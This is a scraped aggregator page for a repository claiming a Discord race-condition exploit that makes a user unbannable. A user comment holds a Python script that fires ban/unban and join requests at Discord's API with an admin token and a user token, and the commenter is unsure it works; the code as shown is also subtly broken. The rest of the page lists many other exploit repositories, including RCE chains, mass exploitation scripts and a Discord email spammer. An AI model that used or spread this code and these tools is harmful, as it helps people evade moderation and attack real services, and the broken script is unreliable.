Discord exploit allowing you to be unbannable.

Overview

Discord-Ban-Immunity

Discord exploit allowing you to be unbannable. 9/3/2021

Found in late August.
Found by Passive and Me.

Explanation

If a user gets banned at the same time that they join a server, Discord seems to still think the user is banned.
Hence why the user won't work, however, kicking the user from the server may work.

Proof of Concept

discord_exploit.mp4

Code

The exploit is difficult to replicate code-wise, so there is no POC source yet.
If you make a working POC source, then make a pull request with the source here. (any programming language)
Or, you can contact me on telegram here.

You might also like...
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Sudo Baron Samedit Exploit

CVE-2021-3156 (Sudo Baron Samedit) This repository is CVE-2021-3156 exploit targeting Linux x64. For writeup, please visit https://datafarm-cybersecur

cve-2021-21985 exploit
cve-2021-21985 exploit

cve-2021-21985 exploit 0x01 漏洞点 分析可见: https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis 0x02 exploit 对beans对象进行重新构

RCE Exploit for Gitlab 13.9.4

GitLab-Wiki-RCE RCE Exploit for Gitlab 13.9.4 RCE via unsafe inline Kramdown options when rendering certain Wiki pages Allows any user with push acc

Phoenix Framework is an environment for writing, testing and using exploit code.
Phoenix Framework is an environment for writing, testing and using exploit code.

Phoenix Framework is an environment for writing, testing and using exploit code. 🖼 Screenshots 🎪 Community PwnWiki Forums 🔑 Licen

ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

ProxyShell Install git clone https://github.com/ktecv2000/ProxyShell cd ProxyShell virtualenv -p $(which python3) venv source venv/bin/activate pip3 i

Automatic ProxyShell Exploit

proxyshell-auto usage: proxyshell.py [-h] -t T Automatic Exploit ProxyShell optional arguments: -h, --help show this help message and exit -t T

Übersicht remote command execution 0day exploit
Übersicht remote command execution 0day exploit

Übersicht RCE 0day Unauthenticated remote command execution 0day exploit for Übersicht. Description Übersicht is a desktop widget application for m

A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution

CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C

Comments
  • possible poc???

    possible poc???

    `# Discord Immunity Exploit

    Orignal Exploit By: dehoisted | https://github.com/dehoisted

    Author: psn#0001 | https://github.com/9yp

    import sys import requests import threading def main() -> None: if len(sys.argv) < 4: print("python3 exploit.py <admin_token> <user_token> <user_id> <server_id> <server_invite>") sys.exit() start = 'False' admin_token = sys.argv[1] user_token = sys.argv[2] serverid = sys.argv[3] userid = sys.argv[4] serverinvite = sys.argv[5] def admin_thread(token, server, userr): print("[!] Admin Thread Ready") while True: if start == 'True': r=requests.put(f"https://discord.com/api/v9/guilds/{server}/bans/{userr}", headers={"Authorization": token}).status_code print(f"[+] Ban Request Sent | {r}") r=requests.delete(f"https://discord.com/api/v9/guilds/{server}/bans/{userr}", headers={"Authorization": token}).status_code print(f"[+] Unban Request Sent | {r}") break def user_thread(token, inv): print("[!] User Thread Ready") while True: if start == 'True': r=requests.post(f"https://discordapp.com/api/v6/invite/{inv}", headers={"Authorization": token}).status_code print(f"[+] Join Request Sent | {r}") break print("[*] Starting Threads") threading.Thread(target=admin_thread, args=(admin_token, serverid, userid, )).start() threading.Thread(target=user_thread, args=(user_token, serverinvite)).start() if name == "main": main()`

    tbh bro idk if this would work or not but i was bored as hell nd this should work

    opened by swbnuhdfbdhwbhjdewuidhbw 0
Owner
orlando
C++ and C#
orlando
Discord-email-spammer-exploit - A discord email spammer exploit with python

Discord-email-spammer-exploit was made by Love ❌ code ✅ ?? ・Description First it

Rdimo 25 Aug 13, 2022
Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP

null 258 Jan 2, 2023
log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

null 3 Aug 13, 2022
Tinyman exploit finder - Tinyman exploit finder for python

tinyman_exploit_finder There was a big tinyman exploit. You can read about it he

fish.exe 9 Dec 27, 2022
Discord Region Swapping Exploit (VC Overload)

Discord-VC-Exploit Discord Region Swapping Exploit (VC Overload) aka VC Crasher How does this work? Discord has multiple servers that lets people arou

Rainn 11 Sep 10, 2022
adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea

null 136 Jan 2, 2023
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

null 3 Dec 4, 2022
Exploit for CVE-2021-3129

laravel-exploits Exploit for CVE-2021-3129

Ambionics Security 228 Nov 25, 2022
SonicWALL SSL-VPN Web Server Vulnerable Exploit

SonicWALL SSL-VPN Web Server Vulnerable Exploit

null 44 Nov 15, 2022
Proof of Concept Exploit for vCenter CVE-2021-21972

CVE-2021-21972 Proof of Concept Exploit for vCenter CVE-2021-21972

Horizon 3 AI Inc 210 Dec 31, 2022